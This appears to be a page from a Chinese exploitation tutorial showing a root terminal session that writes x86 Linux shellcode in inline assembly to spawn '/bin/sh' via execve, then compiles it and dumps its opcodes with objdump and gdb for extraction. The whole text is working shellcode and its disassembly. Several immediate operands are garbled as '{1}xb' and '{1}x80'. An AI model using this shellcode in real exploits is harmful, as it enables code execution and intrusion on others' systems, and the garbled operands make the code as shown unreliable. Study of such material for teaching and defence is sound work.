root@linux:~/pentest# cat shellcode_asm.c
#include <stdio.h>
int main(int argc, char **argv) {
__asm__
(" \
jmp subroutine_call; \
subroutine: \
popl %esi; \
movl %esi,0x8(%esi); \
xorl %eax,%eax; \
movl %eax,0xc(%esi); \
movb %al,0x7(%esi); \
movb {1}xb,%al; \
movl %esi,%ebx; \
leal 0x8(%esi),%ecx; \
leal 0xc(%esi),%edx; \
int {1}x80; \
xorl %ebx,%ebx; \
movl %ebx,%eax; \
inc %eax; \
int {1}x80; \
subroutine_call: \
call subroutine; \
.string \"/bin/sh\"; \
");
return 0;
}
root@linux:~/pentest# gcc -g -o shellcode_asm shellcode_asm.c
root@linux:~/pentest# objdump -d shellcode_asm
08048394 <main>:
8048394: 55 push %ebp
8048395: 89 e5 mov %esp,%ebp
8048397: eb 1f jmp 80483b8 <subroutine_call>
08048399 <subroutine>:
8048399: 5e pop %esi
804839a: 89 76 08 mov %esi,0x8(%esi)
804839d: 31 c0 xor %eax,%eax
804839f: 89 46 0c mov %eax,0xc(%esi)
80483a2: 88 46 07 mov %al,0x7(%esi)
80483a5: b0 0b mov {1}xb,%al
80483a7: 89 f3 mov %esi,%ebx
80483a9: 8d 4e 08 lea 0x8(%esi),%ecx
80483ac: 8d 56 0c lea 0xc(%esi),%edx
80483af: cd 80 int {1}x80
80483b1: 31 db xor %ebx,%ebx
80483b3: 89 d8 mov %ebx,%eax
80483b5: 40 inc %eax
80483b6: cd 80 int {1}x80
080483b8 <subroutine_call>:
80483b8: e8 dc ff ff ff call 8048399 <subroutine>
80483bd: 2f das
80483be: 62 69 6e bound %ebp,0x6e(%ecx)
80483c1: 2f das
80483c2: 73 68 jae 804842c <__libc_csu_init+0x5c>
80483c4: 00 b8 00 00 00 00 add %bh,0x0(%eax)
80483ca: 5d pop %ebp
80483cb: c3 ret
80483cc: 90 nop
80483cd: 90 nop
80483ce: 90 nop
80483cf: 90 nop
root@linux:~/pentest# gdb shellcode_asm
(gdb) b main
Breakpoint 1 at 0x8048397: file shellcode_asm.c, line 5.
(gdb) r
Starting program: /root/pentest/shellcode_asm
Breakpoint 1, main (argc=1, argv=0xbffff464) at shellcode_asm.c:5
5 __asm__
(gdb) disass main
Dump of assembler code for function main:
0x08048394 <+0>: push %ebp
0x08048395 <+1>: mov %esp,%ebp
=> 0x08048397 <+3>: jmp 0x80483b8 <subroutine_call>
0x08048399 <+5>: pop %esi
0x0804839a <+6>: mov %esi,0x8(%esi)
0x0804839d <+9>: xor %eax,%eax
0x0804839f <+11>: mov %eax,0xc(%esi)
0x080483a2 <+14>: mov %al,0x7(%esi)
0x080483a5 <+17>: mov {1}xb,%al
0x080483a7 <+19>: mov %esi,%ebx
0x080483a9 <+21>: lea 0x8(%esi),%ecx
0x080483ac <+24>: lea 0xc(%esi),%edx
0x080483af <+27>: int {1}x80
0x080483b1 <+29>: xor %ebx,%ebx
0x080483b3 <+31>: mov %ebx,%eax
0x080483b5 <+33>: inc %eax
0x080483b6 <+34>: int {1}x80
0x080483b8 <+0>: call 0x8048399 <main+5>
0x080483bd <+5>: das
0x080483be <+6>: bound %ebp,0x6e(%ecx)
0x080483c1 <+9>: das
0x080483c2 <+10>: jae 0x804842c
0x080483c4 <+12>: add %bh,0x0(%eax)
0x080483ca <+18>: pop %ebp
0x080483cb <+19>: ret
End of assembler dump.
(gdb) x/s 0x080483bd
0x80483bd <subroutine_call+5>: "/bin/sh"
进一步完善shellcode的提取(4)
内容版权声明:除非注明,否则皆为本站原创文章。